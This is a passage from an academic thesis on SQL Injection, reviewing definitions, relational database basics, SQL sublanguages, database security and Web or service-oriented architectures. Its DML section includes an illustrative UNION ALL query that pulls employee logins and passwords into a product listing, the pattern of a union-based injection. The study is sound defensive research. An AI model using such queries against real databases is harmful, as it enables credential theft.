specifically mentions the application layer when he states that «it is an application layer
attack to inject SQL commands along with other valid inputs possibly via web pages». By
going through all these views it is possible to determine that SQL Injection has much to
do with input validation logic and systems architectures. Despite that fact, most literature
sources portray it on a webbed context (Anley 2002b;Boyd & Keromytis 2004;Cerrudo
2002;Finnigan 2002;Huang et al. 2004;Huang et al. 2003;Kost 2003;SecuriTeam.com
2002;Spett 2002) and not few claim this is strictly a Web applications’ problem. This view
can partially be explained by the popularity of Web applications and techniques to exploit
their security vulnerabilities (Buehrer, Weide, & Sivilotti 2005). Many other information
sources were reviewed, but they all present similar views to the ones herein depicted and
all employ a strategy based on cause-effect for defining what SQL Injection is all about.
Now that a survey of the existing definitions for the research topic has been portrayed, it
should be clear that a formal unifying definition is yet to be proposed, possibly, because
the topic is still poorly studied (Landsmann & Strömberg 2003). Regardless of that fact,
this exercise did output some valuable pieces information loosely orbiting the three
causative key factors mentioned before: i) dynamically-generated string literals; ii)
embedding into SQL statements; iii) escaping. These factors are transversally
cross-sectioned by a) tiered application model; b) user input validation logic; c) textual
representation of database query semantics. This set of structured findings will therefore
form the ground basis for a unifying definition of the research topic which will be
attempted on the Taxonomy chapter.

FINDINGS
4 RDBMS and SQL
This section contains a brief overview of the relational database management systems
subject and an introduction to its querying language. These subjects will not be
presented in a complex fashion as the goal is to provide a technical contextual basis for
the research topic. This section heavily relies on encyclopaedias, reports and technical
resources such as SQL Server 2005 Books Online shipped with Microsoft SQL Server 2005
and also available online for free download at Microsoft’s website.
4Relational Database Management Systems – RDBMS
During the mid-20th
century, the emergence of digital technology has been in the origin
of a revolution which changed mankind’s ability to inventory and record data on a
tremendous way. Text was first digitized by computers during the 1960s as a solution for
reducing the time and cost required to publish two American abstracting journals, the
Index Medicus of the National Library of Medicine and the Scientific and Technical
Aerospace Reports of the National Aeronautics and Space Administration (NASA). By the
late 1960s such bodies of digitized alphanumeric information, known as bibliographic
and numeric databases, constituted a new type of information resource (Encyclopædia
Britannica 2006) and the sparkle that set the beginning of a new vibrant database
management systems industry was set.
Though the term “database” originated from the computer industry, its meaning has
been broadened to the extent that the European Union (EU) directive 96/9/EC of the
European Parliament and of the Council of 11 March 1996 on the legal protection of
databases includes non-electronic databases within its definition. A simple definition
could be «a database is an organized collection of data» (Wikipedia 2006d), whereas,
according to the same source, a relational database is «a database structured in

FINDINGS
accordance with the relational model». Connolly, Begg, & Strachan (1999) define it as «a
shared collection of logically related data (and a description of this data), designed to
meet the information needs of an organization». According to these two definitions, a
relational database, in strict terms, refers to a collection of structured data8
which
subsequently implies the need for metadata9
. On the other hand, it exists with the sole
purpose of meeting information needs. The fact it has a purpose implies that having a
collection of structured data is not enough as the collection itself must be managed in
order to meet specific business needs. Invariably, a database must be employed together
with the software used to manage that collection of data. This piece of software is
known as relational database management system (RDBMS). Depending the database
role, whether analytical or online transactional, the RDBMS will implement different
mechanisms to define the structure and manage the data. The SQL Server 2005 Books
Online (Microsoft 2006) provides a brief insight into these types of databases:
OLTP Database
Online Transaction Processing (OLTP) relational databases are optimal for managing
changing data. They typically have several users who are performing transactions at the
same time that change real-time data. Although individual requests by users for data
generally reference few rows, many of these requests are being made at the same time.
OLTP databases are designed to let transactional applications write only the data needed
to handle a single transaction as quickly as possible. OLTP databases generally do the
following:
8
An example of unstructured data would be the collection of files on a file system. An example of semi-structured
data would be the collection of received emails on a mailbox.
9
Metadata is defined data about data. In this case, metadata would be the model used to define the structure on
which the data itself will be organized into.

FINDINGS
• Support large numbers of concurrent users who are regularly adding and
modifying data;
• Represent the constantly changing state of an organization, but do not save its
history;
• Contain lots of data, including extensive data used to verify transactions;
• Have complex structures;
• Are tuned to be responsive to transaction activity;
• Provide the technology infrastructure to support the day-to-day operations of
an organization;
• Individual transactions are completed quickly and access relatively small
amounts of data. OLTP systems are designed and tuned to process hundreds or
thousands of transactions being entered at the same time.
The data in OLTP systems is organized primarily to support transactions, such as the
following:
• Recording an order from a point-of-sale terminal or entered through a Web
site;
• Placing an order for more supplies when inventory quantities drop to a
specified level;
• Tracking components as they are assembled into a final product in a
manufacturing facility;
• Recording employee data;

FINDINGS
OLAP Database / Datawarehouse
In contrast to an OLTP database in which the purpose is to capture high rates of data
changes and additions, the purpose of a data warehouse is to organize lots of stable
data for ease of analysis and retrieval. A data warehouse is frequently used as the basis
for a business intelligence application.
Following is a list of what datawarehouses can do:
• Combine data from heterogeneous data sources into a single homogenous
structure;
• Organize data in simplified structures for efficiency of analytical queries instead
of for transaction processing;
• Contain transformed data that is valid, consistent, consolidated, and formatted
for analysis;
• Provide stable data that represents business history;
• Be updated periodically with additional data instead of making frequent
transactions;
• Simplify security requirements.
Depending on the database role, the relational database structure will be radically
different and likewise its querying language and client tools. For example, MS SQL Server
2005 uses Transact-SQL for querying OLTP databases, whereas MDX is used for querying
multi-dimensional OLAP databases. Although the research topic is transversal to the
database role, one of this research’s goals is to focus e-Business systems, which according
to the findings gathered so far, rules out analytical systems as they fall more onto the
strategic planning class. Furthermore, literature puts a big emphasis on the Web and

FINDINGS
establishes a strong correlation between SQL Injection and online data management,
stressing out the bond of the research topic with OLTP databases. For this reason, this
literature research will drop sources of information that will lead on the OLAP direction.
According to Anley (2002b) «there are many varieties of SQL; most dialects that are in
common use at the moment are loosely based around SQL-92, the most recent ANSI
standard». This fact is an indirect consequence of the existence of multiple RDBMS
vendors that in the heat of fight try to enhance their products with additions and handy
goodies that move them away from the standard. This fact alone justifies the need for a
better understanding of the existing installed base of RDBMSs. Additionally, since SQL
Injection is a logical type of attack, a thorough understanding of the attack subject can
prove itself priceless to the attacker. According to the Gartner Group (2002), three major
players surfaced as the foremost RDBMS vendors in 2002 on a 8.8 billion USD market:
Figure 13 - Worldwide RDBMS Market Share in 2002
> adapted from (Gartner Group 2002) <
At present days, Microsoft competes with its MS SQL Server 2005, Oracle with Oracle
10G and IBM with DB2. Gartner (2003) also presents an analysis of the evolution of the
market where it is visible the evolution of the market as per the following diagram:
Microsoft 16.3%
Oracle 32%
Sybase 2.6%
Other 14.4%
IBM 31.7%

FINDINGS
Figure 14 - Worldwide RDBMS Market Share in 2003 Excluding Mainframes
IBM lost 2% market share to Microsoft and Oracle, yet, due to the market growth, this
represented a net sales increase of 11% to both wining parties. Still, the big picture
remained pretty much unaltered. This snapshot of the reality was taken before Microsoft
released its promising new RDBMS, MS SQL Server 2005, which aims to reclaim more
market share. On the other hand, tendencies seem to be changing in terms of base
operating systems used for hosting RDBMS and Microsoft Windows is now leading the
way with 51% market share. This situation benefits MS SQL Server as the same software
house that releases the operating system is in better position to supply the RDBMS.
Due to the assortment of SQL implementations (Anley 2002b) it is prudent to reduce the
scope of the research in terms of prototyping subjects and nomenclature. For this
research, this principle can be safely applied since SQL Injection is not a problem of a
particular RDBMS vendor (Cerrudo 2002). Because of MS SQL Server promising future
and known flexibility (Cerrudo 2002) this platform will be used henceforward whenever
sampling, experimentation or prototyping take place

FINDINGS
4Data Definition Language – DDL
The SQL language has two main divisions: Data Definition Language (DDL), which is used
to define and manage all the objects in an SQL database, and Data Manipulation
Language (DML), which is used to select, insert, update, and delete data in the objects
defined using DDL (Microsoft 2006). The Transact-SQL DDL used to manage objects such
as databases, tables, and views is based on SQL-92 DDL statements and is what enables
database administrators (DBAs) to define the structure of data, also known as schema.
Connolly, Begg, & Strachan (1999) define it as «a descriptive language that allows the
DBA or user to describe and name the entities required for the application and the
relationships that may exist between the different entities». In other words, DDL is the
SQL subset that enables the implementation of a data model. Defining such requires
business and functional requirements’ analysis which is generally carried-out by an
analyst. Although data modelling is out of scope for this work, DDL statements constitute
a proliferous field for SQL Injection techniques. Knowing how to manipulate data
structures can bring simple SQL Injection
attacks from plain data manipulation to a
whole new level of exploitation. On a RDBMS,
for each object class, e.g. Tables, Triggers, etc.,
there are usually CREATE, ALTER, and DROP
statements, such as CREATE TABLE, ALTER
TABLE, and DROP TABLE. Let’s consider a simple example where a
sales order is stored on a relational database. Although there are
several entities involved, this example only focuses two of them: the
sales order itself, and the sales order items, as per the shown model.
These two entities are represented in the form of tables which are
Figure 15 - Simple Relational Data Structure
> adapted from “SQL Server’s AdventureWorks Database” <

FINDINGS
linked by means of a relation. In this case, a one-to-many relation which indicates that an
order item must always belong to an existing order, and that an existing order may have
multiple order items. The following Transact-SQL script would create such structure on an
existing database:
/****** Object: Table [dbo].[SalesOrderHeader] ******/
CREATE TABLE [dbo].[SalesOrderHeader](
[SalesOrderID] [int] IDENTITY(1,1) NOT FOR REPLICATION NOT NULL,
[CustomerID] [int] NULL,
[SalesPersonID] [int] NULL,
[TerritoryID] [tinyint] NULL,
[PurchaseOrderNumber] [int] NULL,
[CurrencyCode] [nchar](3) NULL,
[SubTotal] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_SubTotal]
DEFAULT (0),
[TaxAmt] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_TaxAmt]
DEFAULT (0),
[Freight] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_Freight]
DEFAULT (0),
[OrderDate] [datetime] NOT NULL CONSTRAINT
[DF_SalesOrderHeader_OrderDate] DEFAULT (getdate()),
[RevisionNumber] [tinyint] NULL,
[Status] [tinyint] NULL CONSTRAINT [DF_SalesOrderHeader_Status]
DEFAULT (1),
[BillToAddressID] [int] NULL,
[ShipToAddressID] [int] NULL,
[ShipDate] [datetime] NULL,
[ShipMethodID] [tinyint] NULL,
[CreditCardID] [tinyint] NULL,
[CreditCardNumber] [nvarchar](20) NULL,
[CreditCardExpMonth] [tinyint] NULL,
[CreditCardExpYear] [smallint] NULL,
[ContactID] [int] NULL,
[OnlineOrderFlag] [bit] NOT NULL CONSTRAINT
[DF_SalesOrderHeader_OnlineOrderFlag] DEFAULT (1),
[Comment] [nvarchar](128) NULL,
[ModifiedDate] [datetime] NOT NULL CONSTRAINT
[DF_SalesOrderHeader_ModifiedDate] DEFAULT (getdate()),
[rowguid] [uniqueidentifier] ROWGUIDCOL NOT NULL CONSTRAINT
[DF_SalesOrderHeader_rowguid] DEFAULT (newid()),
[DueDate] [datetime] NULL,
[SalesOrderNumber] AS ('SO' + convert(nvarchar(23),[SalesOrderID])),
[TotalDue] AS ([Freight] + [TaxAmt] + [SubTotal]),
CONSTRAINT [PK_SalesOrderHeader_SalesOrderID] PRIMARY KEY CLUSTERED
(
[SalesOrderID] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]
GO

FINDINGS
Although the complexity level of this script is rather simple, only a trained person would
be able to fully understand it and, if necessary, create one. But if defining a simple
schema takes such a vast amount of code, what about other tasks such as administrative
tasks or even core maintenance procedures? Furthermore, the SQL-92 DDL does not
encompass all of the possible tasks one might want to perform (Microsoft 2006). For this
matter, administrative tasks not covered in the SQL-92 DDL definition are typically
performed using system stored procedures. These can dramatically expand the types of
operations one can perform. However, due to their very nature, these stored procedures
are rigidly-tied to the hosting RDBMS. Its existence pushes the different dialects of SQL
farther away for each other. Conversely, they can streamline the RDBMS enormously. The
/****** Object: Table [dbo].[SalesOrderDetail] ******/
CREATE TABLE [dbo].[SalesOrderDetail](
[SalesOrderID] [int] NOT NULL,
[LineNumber] [tinyint] NOT NULL,
[ProductID] [int] NULL,
[SpecialOfferID] [int] NULL,
[CarrierTrackingNumber] [nvarchar](25) NULL,
[OrderQty] [smallint] NOT NULL,
[UnitPrice] [money] NOT NULL,
[UnitPriceDiscount] [float] NOT NULL CONSTRAINT
[DF_SalesOrderDetail_UnitPriceDiscount] DEFAULT (0),
[ModifiedDate] [datetime] NOT NULL CONSTRAINT
[DF_SalesOrderDetail_ModifiedDate] DEFAULT (getdate()),
[rowguid] [uniqueidentifier] ROWGUIDCOL NOT NULL CONSTRAINT
[DF_SalesOrderDetail_rowguid] DEFAULT (newid()),
[LineTotal] AS ([UnitPrice] * (1 - isnull([UnitPriceDiscount],0)) *
[OrderQty]),
CONSTRAINT [PK_SalesOrderDetail_SalesOrderID_LineNumber] PRIMARY KEY CLUSTERED
(
[SalesOrderID] ASC,
[LineNumber] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]
GO
/****** Relation: SalesOrderDetail/SalesOrderHeader ******/
ALTER TABLE [dbo].[SalesOrderDetail] WITH NOCHECK ADD CONSTRAINT
[FK_SalesOrderHeader_SalesOrderDetail] FOREIGN KEY([SalesOrderID])
REFERENCES [dbo].[SalesOrderHeader] ([SalesOrderID])
GO
ALTER TABLE [dbo].[SalesOrderDetail] CHECK CONSTRAINT
[FK_SalesOrderHeader_SalesOrderDetail]

FINDINGS
following table shows the different categories of system stored procedures shipped with
MS SQL Server 2005 (Microsoft 2006):
Category Description
Active Directory Stored
Procedures
Used to register instances of SQL Server and SQL Server
databases in Microsoft Windows 2000 Active Directory.
Catalog Stored
Procedures
Used to implement ODBC data dictionary functions and isolate
ODBC applications from changes to underlying system tables.
Cursor Stored
Procedures
Used to implements cursor variable functionality.
Database Engine Stored
Procedures
Used for general maintenance of the SQL Server Database
Engine.
Database Mail and SQL
Mail Stored Procedures
Used to perform e-mail operations from within an instance of
SQL Server.
Database Maintenance
Plan Stored Procedures
Used to set up core maintenance tasks that are required to
manage database performance.
Distributed Queries
Stored Procedures
Used to implement and manage Distributed Queries, e.g.
queries that merged data from other data sources
Full-Text Search Stored
Procedures
Used to implement and query full-text indexes.
Log Shipping Stored
Procedures
Used to configure, modify, and monitor log shipping
configurations.
Automation Stored
Procedures
Enable standard Automation objects to be used within a
standard Transact-SQL batch.
Notification Services
Stored Procedures
Used to manage SQL Server 2005 Notification Services.

FINDINGS
Category Description
Replication Stored
Procedures
Used to manage replication.
Security Stored
Procedures
Used to manage security.
SQL Server Profiler
Stored Procedures
Used by SQL Server Profiler to monitor performance and
activity.
SQL Server Agent
Stored Procedures
Used by SQL Server Agent to manage scheduled and event-
driven activities.
Web Task Stored
Procedures
Used for creating Web pages.
XML Stored
Procedures
Used for XML text management.
General Extended
Stored Procedures
Provide an interface from an instance of SQL Server to external
programs for various maintenance activities.
Table 1 - System Stored Procedures in MS SQL Server 2005
> adapted from (Microsoft 2006) <
If security is not properly set-up and an SQL Injection attack takes place, these stored
procedures can multiply many times the impact of the attack. According to Cerrudo
(2002), an information source widely cited by others in this field, «SQL Injection is not a
defect of Microsoft SQL Server (…). Perhaps the biggest issue with Microsoft SQL Server
is the flexibility of the system. This flexibility is what allows it to be subverted so far by SQL
Injection». Flexibility is in great measure achieved through the existence of such a vast
collection of embedded system stored procedures. But then again, all three major
RDBMS are shipped with a rich set of system stored procedures.

FINDINGS
4Data Manipulating Language – DML
Whereas early query languages were originally so complex that interacting with electronic
databases could be done only by specially trained individuals, recent interfaces are more
user-friendly, allowing casual users to access database information (Encyclopædia
Britannica 2006). This is possible through the use of fourth-generation programming
languages (4GL)10
as they are designed to reduce programming effort and the time and
cost of software development. One implementation of the 4GL approach is the
Structured Query Language (SQL) which has the form:
Select [field Fa, Fb, . . . , Fn]
From [database Da, Db, . . . , Dn]
Where [field Fa = abc] and [field Fb = def].
At first glance, its similarity to English may blur reality since, unlike natural languages, its
syntax is in fact limited and fixed to the point it could be represented in tabular form.
Structured query languages support database searching and several other types of
operations, and DML is its subset that specifically addresses operations targeting data
retrieval and data manipulation. According to Wikipedia (2006c) and Microsoft
(Microsoft 2006), the main clauses used with the SELECT statement – the most
frequently used operation in transactional databases – include:
10
Other generations are: 1GL, where no translator was used to compile or assemble the language and
programming instructions were entered through the front panel switches of the computer system; 2GL, where
the code can be read and written fairly easily by a human, but it must be converted into a 1GL machine readable
form by means of a compiler;3GL, a programming language designed to be easier for a human to understand,
including things like named variables and objects; 5GL, based around solving problems using constraints given to
the program, rather than using an algorithm written by a programmer.

FINDINGS
• FROM – is used to indicate from which sources the data is to be taken, as well
as how these join to each other. These data sources could be:
Ø Base tables in the local RDBMS;
Ø Views in the local RDBMS;
Ø Linked tables. These are external tables accessible via OLE DB data sources;
• WHERE – is a filter that defines the conditions each row in the source tables
must meet to qualify for the SELECT. Only rows that meet the conditions
contribute data to the result set. Data from rows that do not meet the
conditions is not used. WHERE is evaluated before the GROUP BY.
• GROUP BY – partitions the result set into groups based on the values in the
columns of the group_by_listed. Combines rows with related values into
elements of a smaller set of rows;
• HAVING – is an additional filter that is applied to the result set. Logically, the
HAVING clause filters rows from the intermediate result set built from applying
any FROM, WHERE, or GROUP BY clauses in the SELECT statement. HAVING
clauses are typically used with a GROUP BY clause, although a GROUP BY
clause is not required before a HAVING clause. It is used to identify which of
the "combined rows" (combined rows are produced when the query has a
GROUP BY keyword or when the SELECT part contains aggregates), are to be
retrieved. HAVING acts much like a WHERE, but it operates on the results of the
GROUP BY and hence can use aggregate functions.
• ORDER BY – defines the order in which the rows in the result set are sorted.
order_list specifies the result set columns that make up the sort list. The ASC
and DESC keywords are used to specify if the rows are sorted in an ascending
or descending sequence. Relational theory specifies that the rows in a result set
cannot be assumed to have any sequence unless ORDER BY is specified.

FINDINGS
But these are the basics of the basics. So far literature as revealed that, like the name
suggests, SQL Injection has a great deal to do with injecting other queries onto legitimate
query structures. Therefore the ability to use subqueries is of high relevance when
exploring the research topic (Livshits & S.Lam 2005). According to Microsoft’s view, «a
subquery is a query that is nested inside a SELECT, INSERT, UPDATE, or DELETE statement,
or inside another subquery. A subquery can be used anywhere an expression is allowed»
(Microsoft 2006). An example would be as follows:
Microsoft also adds that ultimately the subquery can be evaluated as if it were an
independent query, which seems perfectly inline to what a hacker would seek for
perpetrating a SQL Injection attack. The combination of result sets is another form of
executing additional statements as in the following example:
The result set yielded by the first statement is combined with the result set yielded by a
second statement that masquerades its output structure to equal the one defined by the
first SELECT statement. The UNION, INTERSECT and EXCEPT statements allow to combine
result sets yielded by different data retrieval operations and combine them into a single
result set. DML is rather vast and complex and only a few instructions have been covered.
SELECT [Name]
FROM dbSales.Production.Product
UNION ALL
SELECT Login + '/' + Password As [Name]
FROM dbSales.Production.Employees
SELECT [Name]
WHERE ListPrice =
(SELECT ListPrice
WHERE [Name] = 'Paper Clips' )

FINDINGS
4Data Control Language – DCL
Like DDL and DML, Data Control Language (DCL) is a fourth-generation programming
languages (4GL) and also a subset of SQL, used to control access to data in a database.
The following data control statements are part of DCL:
• GRANT to allow specified users to perform specified tasks;
• REVOKE to cancel previously granted or denied permissions.
DCL is specifically used to set permissions on database objects and statements. In general,
after the database and database objects are created through DDL, the next step is to
set-up permissions using the statements provided by the Data Control Language.
4Security in Databases
Understanding the inner security model of the RDBMS can serve both offending and
defending parties. To this point is has been established that SQL Injection attacks will
primarily occur using the exploited application’s security context. Primarily, since one of
the steps of the attack may encompass elevation of privileges. Nonetheless, it is
reasonable to assume that the entrypoint will use the current security context of the
application to authenticate against the RDBMS. Regardless the user mapping
mechanisms in place, whether the application impersonates its own user to gain access
to the database or it forwards the user’s network credentials, a legitimate authenticated
channel is used and the options to thereon proceed with an attack will be restricted by
the types of operations granted to that specific security context. Therefore a thorough
understating of the database securables and of the operations the application requires to

FINDINGS
perform on the RDBMS is paramount for implementing the least-privilege principle11
, the
defending party’s perspective, or exploit opportunities, the offending party’s goal.
According to Connolly (1999), database security concerns «the protection of the
database against intentional or unintentional threats using computer-based or
non-computer-based controls». Though SQL Injection is clearly a computer-based kind of
attack, Connolly’s view is rather interesting as it comprises both computer-based attacks
as well as other types of attacks more focused on the human component, like for
example, Social Engineering. Regardless the typology of the threat, they share the same
risks to the information assets. Landsmann & Strömberg (2003) take this implication a
little further and claim that in addition to the risks to the information assets «poor
database security (…) may also threaten other parts of a system and thus an entire
organization». They also identify the following list of risks as being related to database
security:
• Theft and fraud which are activities made intentionally by people. This risk may
result in loss of confidentiality or privacy;
• Loss of confidentiality which refers to loss of organizational secrets;
• Loss of privacy which refers to exposure of personal information;
• Loss of integrity which refers to invalid or corrupt data;
• Loss of availability which means that data or system cannot be reached.
11
The principle came up around mid-1970s but Jerry H.Saltzer & Mike D.Schroeder (1975) were the first to
systematize it by stating that «every program and every user of the system should operate using the least set of
privileges necessary to complete the job». The underlying idea is to grant just the minimum possible privileges to
permit a legitimate action, in order to enhance protection of data and functionality from faults (fault tolerance)
and malicious behaviour.

FINDINGS
Yuhanna (2003) states that in regards to database management systems alone «security
has become increasingly important to enterprises as hackers continue to gain access to
critical and data sensitive databases, disrupting business operations». He claims that a
comprehensive DBMS security architecture should be rigidly-tied to the security
architectures of the interacting technology layers, including server, operating system,
network and applications. He adds that such security architecture should be comprised of
i) database hardening, ii) secure administration processes, iii) tight coordination with
application security architecture and iv) strong approach to data protection.
Operationalizing security in databases, or any type of security for that matter, is a
complex and difficult task. The amount of literature on the subject is huge and it tends to
be very focused around a specific well-defined issue, or it is broad and generic, more in
the form of guidelines, frameworks and principles such as the least-privilege principle
mentioned before. Likewise the deviation of the SQL dialects from the ANSI standard
SQL-92, each database vendor has its own set of security mechanisms and securable
database objects. For example, MS SQL Server 2005 can go down to the level where
some columns in a table can be set to request a valid digital signature for data retrieval.
Another good example is the possibility to revoke grants performed on a higher level.

FINDINGS
Figure 16 - Overriding Table Permissions on MS SQL Server 2005
Other vendors implement security in different ways, but the base security mechanisms
remain fairly similar across all three main RDBMS. Securing a database requires, of course,
deep technical knowledge of that specific RDBMS. Still, this knowledge is not sufficient
for ensuring security as the RDBMS is part of a greater system, usually exposed to public
access through indirect access such as by means of a Web application. Therefore, a
thorough understating of the applications that depend on the RDBMs is crucial, hence it
is necessary to bridge the gap between developers and DBAs (Kunene 2003).

FINDINGS
4 World Wide Web
The purpose of this section is not to characterize the World Wide Web or what is it
about, but to portray the part the Web plays on the grand scene of SQL Injection and
what new dimensions it adds to the problem.
Whereas in the early days of computing computer systems usually were isolated islands
of functionality with little or any interconnectivity, nowadays few are those that sit alone
and do not take part of a broader network of collaborating entities.
Figure 17 - No Application Is An Island
On the old days, security was not really an issue and the worst thing that could happen
would be suffering an attack from yourself. This mindset can be found across several
legacy applications and code (Howard & LeBlanc 2003). Yet, from the findings yielded by
the background review laid-out on the introductory chapter, it has been established that
Web applications often interact with corporate core business systems in order to achieve
their goals. All too often these applications are legacy as organizations cannot get rid of
core business systems at the same rate they become legacy. On top of that, Web
applications are known to suffer rapid development cycles (Huang et al. 2003) and

FINDINGS
although security is paramount for Web applications (Spett 2002) only few can afford a
detailed security review (Nguyen-Tuong et al. 2004). The same background review has
determined that Web architectures are divided into tears, or layers, each of which acting
as an abstraction layer. The data layer – named that way because of its functional role – is
where the relational database management systems reside and to many it constitutes the
foundation stone for e-Business. As Web attacks are rapidly becoming one of the
fundamental threats for information systems connected to the Internet (Álvarez &
Petrovic 2003), the role of the data layer and its location within the corporate protected
network environment elects it as a tempting target.
4Systems Architectures
«Aligning IT to business» is one of those buzz-statements shouted and repeated in
meeting rooms across all sectors of industry whenever a new restructuring or technical
refresh project is to be implemented or pushed to the stakeholders. But what is
architecture anyway? In engineering terms, one could point out that it has to do with the
aspects of the structure of a system. But there is more to it according to the different
definitions proposed by several respectable organizations:
• «The fundamental organization of a system, embodied in its components, their
relationships to each other and the environment, and the principles governing
its design and evolution» (ANSI/IEEE 1471 2000).
• «The composite of the design architectures for products and their life cycle
processes» (IEEE 1220 1998).
• «A representation of a system in which there is a mapping of functionality onto
hardware and software components, a mapping of the software architecture
onto the hardware architecture, and human interaction with these

FINDINGS
components» (Carnegie Mellon University Software Engineering Institute
2006).
• «An allocated arrangement of physical elements which provides the design
solution for a consumer product or life-cycle process intended to satisfy the
requirements of the functional architecture and the requirements baseline»
(Human Engineering 1998).
• «An architecture description is a formal description of a system, organized in a
way that supports reasoning about the structural properties of the system. It
defines the [system] components or building blocks...and provides a plan from
which products can be procured, and systems developed, that will work
together to implement the overall system. It thus enables you to
manage...investment in a way that meets [business] needs...» (Open Group
Architecture Framework 2005).
• «A description of the design and contents of a computer system. If
documented, it may include information such as a detailed inventory of current
hardware, software and networking capabilities; a description of long-range
plans and priorities for future purchases, and a plan for upgrading and/or
replacing dated equipment and software» (The National Center for Education
Statistics 2002).
• «A description of the design and contents of a computer system. If
documented, it may include information such as a detailed inventory of current
hardware, software and networking capabilities; a description of long-range
plans and priorities for future purchases, and a plan for upgrading and/or
replacing dated equipment and software» (Institute of Education Sciences (IES)
2006).

FINDINGS
Judging from the number of definitions, just to mention a few, an architecture is
something very complex to define since it relates to a context, longs to achieve a set of
goals, and for that matter, involves means. An article at Wikipedia (2006a) on this subject
neatly summarizes what a robust architecture ought to be, by stating that «a robust
architecture is said to be one that exhibits an optimal degree of fault-tolerance, backward
compatibility, forward compatibility, extensibility, reliability, maintainability, availability,
serviceability, usability, and such other “ilities” as necessary and/or desirable». But systems
architectures should be pictured on a broader reality, entailed on what is known as
solution architecture (M.T.Gamble & R.Gamble 2005).
Figure 18 - Bridging the Gap Between Business and IT
Systems architecture could be compared to a bridge’s sustentation arch on which the
solution is based upon. Delivering it poses a whole new set of challenges which are tried
to be addressed by project management. Regardless if the context is systems or solutions,
architecture it is all about bridging IT and business together. Designing it requires an
understanding of the needs and requirements of a wide range of stakeholders covering
Architecture
Business/IT “Synchronization”
BusinessBusiness IT StrategyIT Strategy

FINDINGS
the complete scope of the solution (Jari A.Lehto & Pentti Marttiin 2005). Lehto and
Marttiin also state that «system architecture is a powerful means to combine the
diversified needs of several stakeholders». The IEEE standard (ANSI/IEEE 1471 2000) also
opts for a business-centric view of an architecture by placing it at the stakeholders’
service. That standard states that each system must have an architecture and should have
an architectural description consisting of one or more views represented in models which
must be conformant to a viewpoint assigned to one or more stakeholders. This view that
the business is the ultimate reason for and beneficiary of
Information Technology forced systems architectures to evolve
and move-up the value chain, culminating on what is
nowadays known as Service-Oriented
Architectures (confer with Figure 2 - The
Evolution of Information Technology
Architectures on page
27).
Figure 19 - The Evolution to Services
Most literature sources simply cannot resist mentioning Web Services technology
whenever SOA is described (Barry 2003;Calladine 2004;Endrei et al. 2004;Erl 2004), to
the point that many portray SOA only to be possible through the use of Web Services.
Pre-1990s
Custom, static
B2B Integration
Early 1990s
Application integration
technologies appear
Late 1990s
Web technologies appear
e.g., HTTP, HTML, XML
2000+
Web Services
Service-Oriented
Solutions
BBuussiinneessss BBeenneeffiitt

FINDINGS
The Worldwide Web Consortium (W3C) defines SOA as «a set of components which can
be invoked, and whose interface descriptions can be published and discovered» (W3C
2004). IBM’s view is a bit more technology-centric as they state that «a service-oriented
architecture (SOA) is an application framework that takes everyday business applications
and breaks them down into individual business functions and processes, called services.
An SOA lets you build, deploy and integrate these services independent of applications
and the computing platforms on which they run» (IBM 2005).
Figure 20 - Gartner Web Services Magic Quadrant
Microsoft, the foremost leader on the field of Web Services, expresses a concern for data
exchange on a distributed environment and pictures it as something SOA tries to
address. They state that «Service-Oriented Architecture is an approach to organizing
information technology in which data, logic, and infrastructure resources are accessed by

FINDINGS
routing messages between network interfaces» (Microsoft 2005). “Interoperability”
across heterogeneous systems is therefore the head list of SOA’s implications. Others are
message reliability, service reliably, availability data granularity, normal usability
operations, security, performance, scalability, extensibility, adaptability, testability,
auditability, operability and deployability, and modifyability (O'Brien, Bass, & Merson
2005). As determined previously, the spectrum of “ilities” that fall onto an architecture’s
definition is really dependant of the underlying business goals it tries to accomplish.
Increased interoperability is the most prominent benefit of SOA, especially when Web
Services technology is considered (McGovern et al. 2003). Therefore this must be the
leading factor for the strong bond between SOA and Web Services.
Figure 21 - Web Services Enabled Service-Oriented Architecture
With the SOA approach and Web Services, Web applications are no different from any
other business application. They consume and provide “services” through the use of
“connections”. Though Web Services provide the means for an abstraction layer – a
refitted version of the business-layer of the classic three-tier Web architecture model (see
Figure 8 - Classic Three-Tier Web Architecture Model on page 40) – at the very core of the

FINDINGS
architecture, line of business applications and relational databases remain, yet, they are
now exposed to an outside environment through the use of Web-enabled technologies.
4Security in Applications on the Wild Wild Web
A standard Web security model encompasses four points of authentication before a
query triggered by a remote Web user gets processed on the RDBMS.
Figure 22 - The Four Points of Authentication of a Database-Enabled Remote Web Request
Although many more security barriers can be introduced at the networking level, e.g.
HTTPS, IPSec, etc., SQL Injection attacks rely on the existence of legitimate channels,
hence security barriers at the networking level will mainly serve to prevent unwanted
access, but not necessarily exploitation of a
legitimate connection. Because of this fact, the
model presented opts for a simplistic view
which focuses on three entities and the
underlying service providers, also known as
daemons. A request emanating from a remote
user via a Web-enabled frontend such as a
browser or a Web service as in the SOA
paradigm, must first of all be accepted by the
Web server service, provided that all
networking requirements are already
Figure 23 - Authentication Methods in IIS 6.0
> adapted from “IIS Management Console” <

FINDINGS
met, as for example, when an HTTPS session is established. Different Web servers accept
different authentication methods, but they all support anonymous access, the most
commonly used option on the Web as users are by definition external to the
organization. One particular case is Microsoft Internet Information Server (IIS). It
implements an option only it can offer; if the remote user is a member of a trusted
Windows domain, IIS allows the user’s credentials to be propagated down to the Web
application level. Once the user has been granted the right to invoke a resource at the
Web server, then it is up to the underlying Web application to carry on. At this point, the
security road divides itself into two distinct paths: whether the Web application
impersonates the requesting user’s security context to carry on its tasks – this only really
applies if anonymous access has not been used, or it will use its own embedded account
to authenticate itself against the operation system and perform the necessary operations
on the user’s behalf.
Figure 24 - User vs. Account Impersonation on a Web Application

FINDINGS
Regardless of the security model used or the vendor of the Web server, the security
context on which the Web application is executed will be used to authenticate the Web
application against the database system (see Figure 6 - Typical Web Infrastructure Layout
on page 34). Depending on the RDBMS sitting on the DMZ and on the impersonation
model used by the Web application, the credentials used for accessing database objects
within the RDBMS can be one of two: whether the security model and information
systems allow user integrated authentication, meaning the requesting user’s credentials
are forwarded all the way down to the database and the user itself exists on the RDBMS,
or the Web application must impersonate a database-specific user to carry on with its
tasks (refer to topic «Security in Databases» within this chapter).
As established before, SQL Injection takes advantage of legitimate channels which in turn
implies that legitimate security contexts are used as well. If this is so, at first sight it seems
